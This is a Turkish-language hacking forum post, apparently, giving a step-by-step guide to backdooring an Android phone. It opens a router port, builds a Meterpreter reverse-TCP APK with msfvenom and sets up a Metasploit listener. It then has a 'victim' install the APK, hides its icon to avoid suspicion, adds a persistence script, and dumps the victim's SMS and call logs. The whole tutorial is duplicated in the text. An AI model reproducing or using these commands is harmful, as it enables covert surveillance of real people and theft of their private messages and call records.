Pâtya
Spys-Z
[font=Roboto, sans-serif]Konu : Android'e Sızmak.[/font]
[font=Roboto, sans-serif]Kullanılan Araçlar : Kali Linux Ve Beyin(Kali Yerine Parrot,Cyborg,Ubuntu Gibi Dağıtımlar Kullanılabilir.)[/font]
[font=Roboto, sans-serif]----------------------------------------------------------------------------------------------------------------------------[/font]
[font=Roboto, sans-serif]Başyalım,(İLK KISIM BİRAZ FAZLA DETAYLI OLABİLİR SIKILIRSANIZ ATLAYIN.)[/font]
[font=Roboto, sans-serif]Önce Port Açalım Port Bağlantı Kurmamıza Yarar Eğer Kendi Ağınızdaki Bir Android Telefonu Hackleyecek İseniz Gerek Yok Bu İşleme[/font]
[font=Roboto, sans-serif]Ben Netmaster Uydunet Kullanıyorum O Yüzden 192.168.0.1 Rakamlarını Üst Çubuğa Yazıp Modem Arayüzüne Gireceğim.[/font]
[font=Roboto, sans-serif]Username : admin Password : admin (varsayılan değiştirdiyseniz veya değiştirdiler ise farklı olabilir.)[/font]
[font=Roboto, sans-serif]Sonra Karşıma Wifi Ağımın Adı Ve Şifre Değiştime Kısmı Geldi Ben Aldırış Etmeyip "Gelişmiş Ayarlar >" Yazan Butona Tıkladım.Ordanda "Gelişmiş" e Tıkladım. Sol Çubukta Yönlendirme Diyip IPv4 Yarat Dedim.Karşıma Lokal IP VS Çıktı Bende Lokal İp Adresime Bakayım Terminali Açıp "ifconfig" Dedim Bana İp Adresimin 192.168.0.15 Olduğunu Söyledi Bende Lokal İp Ye Onu Yazıp Lokal Başlangıç,Lokal Bitiş,Harici Başlangıç,Harici Bitiş Yazan Yerlerin Karşısına 4444 Yazdım(4444 Zorunlu Değildir.İsterseniz 5555 Yazın Veya 2222 Fark Etmez) Protokolüm TCP Olarak Kalsın.Açıklamaya Ben İlk Kurban Yazdım Sonra Etkini Açık Yapıp Uygula Dedim. Ve Portumuz Açıldı Kimilerinde Port Açılsa Dahi Çalışmaz Bunun Nedeni Sabit Bir İp Adresine Sahip Olmayışınızdır Olup Olmadığınızı Bilmek İçin Temelden WAN Yazan Yerde Görebilirsiniz Eğer 100 İle Başlayıp Devam Ediyorsa(100 Üzeride Olabilir)Bir Sabit İpniz Olamazdır Bunun İçin Müşteri Hizmetlerini Arayın Eğer Mesela 94 İle Başlamasına Rağmen Daha Backdoor VS. Oluşturmadan Port Test Siteleri Kapalı Diyor İse Şuan O Port Kullanılmıyor Diyedir.Biraz Fazla Detay Olmuş Olabilir Ve Portumuz Açıldı.[/font]
[font=Roboto, sans-serif]-----[/font]
[font=Roboto, sans-serif]Şimdi Sıra Backdoor Oluşturmada Terminali Açıp Şu Kodu Giriyoruz.[/font]
[font=Roboto, sans-serif]msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.15 LPORT=4444 R > /root/Masaüstü/KorayYıldız.apk[/font]
[font=Roboto, sans-serif]Şimdi Bu Kodu Ele Alalım,[/font]
[font=Roboto, sans-serif]-p : platform[/font]
[font=Roboto, sans-serif]android/meterpreter/reverse_tcp : payloadımız [/font]
[font=Roboto, sans-serif]LHOST : Local Host Yani ifconfig Yazdığımızda Karşımza Çıkan 192.168.0.15 Gibi Olan Rakam[/font]
[font=Roboto, sans-serif]LPORT : Local Port Yani Modem Arayüzünden Açtığımız 4444 Veya Başka Rakamlar.[/font]
[font=Roboto, sans-serif]R > /root/Masaüstü/KorayYıldız.apk : Kaydedeceğimiz Yer Yani Masaüstüne KorayYıldız.apk Diye Oluştur Dedik. /root Herşeyin Başıdır Ana Dizin Mesela Terminale pwd Yazarsanız /Root Der Size Hemen Altında Yani Şuan Olduğunuz Dizin.Eğer İşletim Sisteminiz İngilizce İse Masaütü Yerine Desktop Yazın.[/font]
[font=Roboto, sans-serif]Yeter Payloadımız Oluştu Şimdi Sıra Metasploit Framwork İlen Kullanmak.[/font]
[font=Roboto, sans-serif]-----[/font]
[font=Roboto, sans-serif]Terminale msfconsole Yazın Bekleyin Biraz Uzun Sürebilir.[/font]
[font=Roboto, sans-serif]Açıldıktan Sonra Şunu Girin[/font]
[font=Roboto, sans-serif]use exploit/multi/handler (Yani Şu Exploiti Kullan Dedik.)[/font]
[font=Roboto, sans-serif]Yazdıktan Sonra Sol Tarafta Belli Olur Olmadıysa Tekrar Girin.[/font]
[font=Roboto, sans-serif]Şimdi Payloadımızı Kullanalım.[/font]
[font=Roboto, sans-serif]set payload android/meterpreter/reverse_tcp[/font]
[font=Roboto, sans-serif]Ondan Sonra[/font]
[font=Roboto, sans-serif]set lhost 192.168.0.15[/font]
[font=Roboto, sans-serif]set port 4444[/font]
[font=Roboto, sans-serif]Ve Mutlu Son İçin[/font]
[font=Roboto, sans-serif]exploit Olmazsa exploit -j Sonra Bidaha exploit Ve Dinlemeye Aldık Kurbana KorayYıldız.apkmızı Yedirelim O Kurup Çalıştırdıktan Sonra Bize meterpreter Oturumu Gelir Hiç Bekleme Yapmadan [/font]
[font=Roboto, sans-serif]hide_app_icon Deyin Çünkü Onda İnen Uygulama Main Activity Adlı Android Simgeli Bişeydir Ve Şüphe Uyandırır Bu Kod Gizlememizi Sağlar Tamam Gizledik Nasıl Kalıcı Olacağız ? Tabikide Persistence Modüllerini Ona Upload Ederek Hemen Yapıyoruz.[/font]
[font=Roboto, sans-serif]Persistence Modülü İçin Leafpad Açıp Şu Kodları Yapıştırıp persistence.sh Diye Kaydedelim Masaüstüne,[/font]
[font=Roboto, sans-serif]#!/bin/bash[/font]
[font=Roboto, sans-serif]while true[/font]
[font=Roboto, sans-serif]do am start --user 0 -a android.intent.action.MAIN -n com.****sploit.stage/.MainActivity[/font]
[font=Roboto, sans-serif]sleep 10[/font]
[font=Roboto, sans-serif]done[/font]
[font=Roboto, sans-serif]Sonra Bunu Kurbanın Telefonuna Upload Edelim.[/font]
[font=Roboto, sans-serif]pwd(Bulunduğumuz Dizin.)[/font]
[font=Roboto, sans-serif]cd sdcard(sdcarda Geçiş Yap.) [/font]
[font=Roboto, sans-serif]pwd(Geçtikmi Bi Kontrol Edelim.)[/font]
[font=Roboto, sans-serif]upload persistence.sh Hata Alırsanız shell Komutunu Girin Sonra Upload Ettik Tam Hatırlamıyorum Çalıştırmamız Gerekmi Diye Ama Zararı Olmaz ./persistence.sh Veya sh persistence.sh Deyin.Tamam Kalıcılığıda Sağladık.[/font]
[font=Roboto, sans-serif]Şimdi Bi Neler Yapabiliriz Bi Bakalım,[/font]
[font=Roboto, sans-serif]help(Kodları Çıkarır.)[/font]
[font=Roboto, sans-serif]sms_dump(Sms Kayıtlarını Ver.) [/font]
[font=Roboto, sans-serif]callog_dump(Arama Kayıtlarını Ver.)[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]
[/font]
[font=Roboto, sans-serif]Kullanılan Araçlar : Kali Linux Ve Beyin(Kali Yerine Parrot,Cyborg,Ubuntu Gibi Dağıtımlar Kullanılabilir.)[/font]
[font=Roboto, sans-serif]----------------------------------------------------------------------------------------------------------------------------[/font]
[font=Roboto, sans-serif]Başyalım,(İLK KISIM BİRAZ FAZLA DETAYLI OLABİLİR SIKILIRSANIZ ATLAYIN.)[/font]
[font=Roboto, sans-serif]Önce Port Açalım Port Bağlantı Kurmamıza Yarar Eğer Kendi Ağınızdaki Bir Android Telefonu Hackleyecek İseniz Gerek Yok Bu İşleme[/font]
[font=Roboto, sans-serif]Ben Netmaster Uydunet Kullanıyorum O Yüzden 192.168.0.1 Rakamlarını Üst Çubuğa Yazıp Modem Arayüzüne Gireceğim.[/font]
[font=Roboto, sans-serif]Username : admin Password : admin (varsayılan değiştirdiyseniz veya değiştirdiler ise farklı olabilir.)[/font]
[font=Roboto, sans-serif]Sonra Karşıma Wifi Ağımın Adı Ve Şifre Değiştime Kısmı Geldi Ben Aldırış Etmeyip "Gelişmiş Ayarlar >" Yazan Butona Tıkladım.Ordanda "Gelişmiş" e Tıkladım. Sol Çubukta Yönlendirme Diyip IPv4 Yarat Dedim.Karşıma Lokal IP VS Çıktı Bende Lokal İp Adresime Bakayım Terminali Açıp "ifconfig" Dedim Bana İp Adresimin 192.168.0.15 Olduğunu Söyledi Bende Lokal İp Ye Onu Yazıp Lokal Başlangıç,Lokal Bitiş,Harici Başlangıç,Harici Bitiş Yazan Yerlerin Karşısına 4444 Yazdım(4444 Zorunlu Değildir.İsterseniz 5555 Yazın Veya 2222 Fark Etmez) Protokolüm TCP Olarak Kalsın.Açıklamaya Ben İlk Kurban Yazdım Sonra Etkini Açık Yapıp Uygula Dedim. Ve Portumuz Açıldı Kimilerinde Port Açılsa Dahi Çalışmaz Bunun Nedeni Sabit Bir İp Adresine Sahip Olmayışınızdır Olup Olmadığınızı Bilmek İçin Temelden WAN Yazan Yerde Görebilirsiniz Eğer 100 İle Başlayıp Devam Ediyorsa(100 Üzeride Olabilir)Bir Sabit İpniz Olamazdır Bunun İçin Müşteri Hizmetlerini Arayın Eğer Mesela 94 İle Başlamasına Rağmen Daha Backdoor VS. Oluşturmadan Port Test Siteleri Kapalı Diyor İse Şuan O Port Kullanılmıyor Diyedir.Biraz Fazla Detay Olmuş Olabilir Ve Portumuz Açıldı.[/font]
[font=Roboto, sans-serif]-----[/font]
[font=Roboto, sans-serif]Şimdi Sıra Backdoor Oluşturmada Terminali Açıp Şu Kodu Giriyoruz.[/font]
[font=Roboto, sans-serif]msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.15 LPORT=4444 R > /root/Masaüstü/KorayYıldız.apk[/font]
[font=Roboto, sans-serif]Şimdi Bu Kodu Ele Alalım,[/font]
[font=Roboto, sans-serif]-p : platform[/font]
[font=Roboto, sans-serif]android/meterpreter/reverse_tcp : payloadımız [/font]
[font=Roboto, sans-serif]LHOST : Local Host Yani ifconfig Yazdığımızda Karşımza Çıkan 192.168.0.15 Gibi Olan Rakam[/font]
[font=Roboto, sans-serif]LPORT : Local Port Yani Modem Arayüzünden Açtığımız 4444 Veya Başka Rakamlar.[/font]
[font=Roboto, sans-serif]R > /root/Masaüstü/KorayYıldız.apk : Kaydedeceğimiz Yer Yani Masaüstüne KorayYıldız.apk Diye Oluştur Dedik. /root Herşeyin Başıdır Ana Dizin Mesela Terminale pwd Yazarsanız /Root Der Size Hemen Altında Yani Şuan Olduğunuz Dizin.Eğer İşletim Sisteminiz İngilizce İse Masaütü Yerine Desktop Yazın.[/font]
[font=Roboto, sans-serif]Yeter Payloadımız Oluştu Şimdi Sıra Metasploit Framwork İlen Kullanmak.[/font]
[font=Roboto, sans-serif]-----[/font]
[font=Roboto, sans-serif]Terminale msfconsole Yazın Bekleyin Biraz Uzun Sürebilir.[/font]
[font=Roboto, sans-serif]Açıldıktan Sonra Şunu Girin[/font]
[font=Roboto, sans-serif]use exploit/multi/handler (Yani Şu Exploiti Kullan Dedik.)[/font]
[font=Roboto, sans-serif]Yazdıktan Sonra Sol Tarafta Belli Olur Olmadıysa Tekrar Girin.[/font]
[font=Roboto, sans-serif]Şimdi Payloadımızı Kullanalım.[/font]
[font=Roboto, sans-serif]set payload android/meterpreter/reverse_tcp[/font]
[font=Roboto, sans-serif]Ondan Sonra[/font]
[font=Roboto, sans-serif]set lhost 192.168.0.15[/font]
[font=Roboto, sans-serif]set port 4444[/font]
[font=Roboto, sans-serif]Ve Mutlu Son İçin[/font]
[font=Roboto, sans-serif]exploit Olmazsa exploit -j Sonra Bidaha exploit Ve Dinlemeye Aldık Kurbana KorayYıldız.apkmızı Yedirelim O Kurup Çalıştırdıktan Sonra Bize meterpreter Oturumu Gelir Hiç Bekleme Yapmadan [/font]
[font=Roboto, sans-serif]hide_app_icon Deyin Çünkü Onda İnen Uygulama Main Activity Adlı Android Simgeli Bişeydir Ve Şüphe Uyandırır Bu Kod Gizlememizi Sağlar Tamam Gizledik Nasıl Kalıcı Olacağız ? Tabikide Persistence Modüllerini Ona Upload Ederek Hemen Yapıyoruz.[/font]
[font=Roboto, sans-serif]Persistence Modülü İçin Leafpad Açıp Şu Kodları Yapıştırıp persistence.sh Diye Kaydedelim Masaüstüne,[/font]
[font=Roboto, sans-serif]#!/bin/bash[/font]
[font=Roboto, sans-serif]while true[/font]
[font=Roboto, sans-serif]do am start --user 0 -a android.intent.action.MAIN -n com.****sploit.stage/.MainActivity[/font]
[font=Roboto, sans-serif]sleep 10[/font]
[font=Roboto, sans-serif]done[/font]
[font=Roboto, sans-serif]Sonra Bunu Kurbanın Telefonuna Upload Edelim.[/font]
[font=Roboto, sans-serif]pwd(Bulunduğumuz Dizin.)[/font]
[font=Roboto, sans-serif]cd sdcard(sdcarda Geçiş Yap.) [/font]
[font=Roboto, sans-serif]pwd(Geçtikmi Bi Kontrol Edelim.)[/font]
[font=Roboto, sans-serif]upload persistence.sh Hata Alırsanız shell Komutunu Girin Sonra Upload Ettik Tam Hatırlamıyorum Çalıştırmamız Gerekmi Diye Ama Zararı Olmaz ./persistence.sh Veya sh persistence.sh Deyin.Tamam Kalıcılığıda Sağladık.[/font]
[font=Roboto, sans-serif]Şimdi Bi Neler Yapabiliriz Bi Bakalım,[/font]
[font=Roboto, sans-serif]help(Kodları Çıkarır.)[/font]
[font=Roboto, sans-serif]sms_dump(Sms Kayıtlarını Ver.) [/font]
[font=Roboto, sans-serif]callog_dump(Arama Kayıtlarını Ver.)[/font]
[font=Roboto, sans-serif] [/font]
[font=Roboto, sans-serif]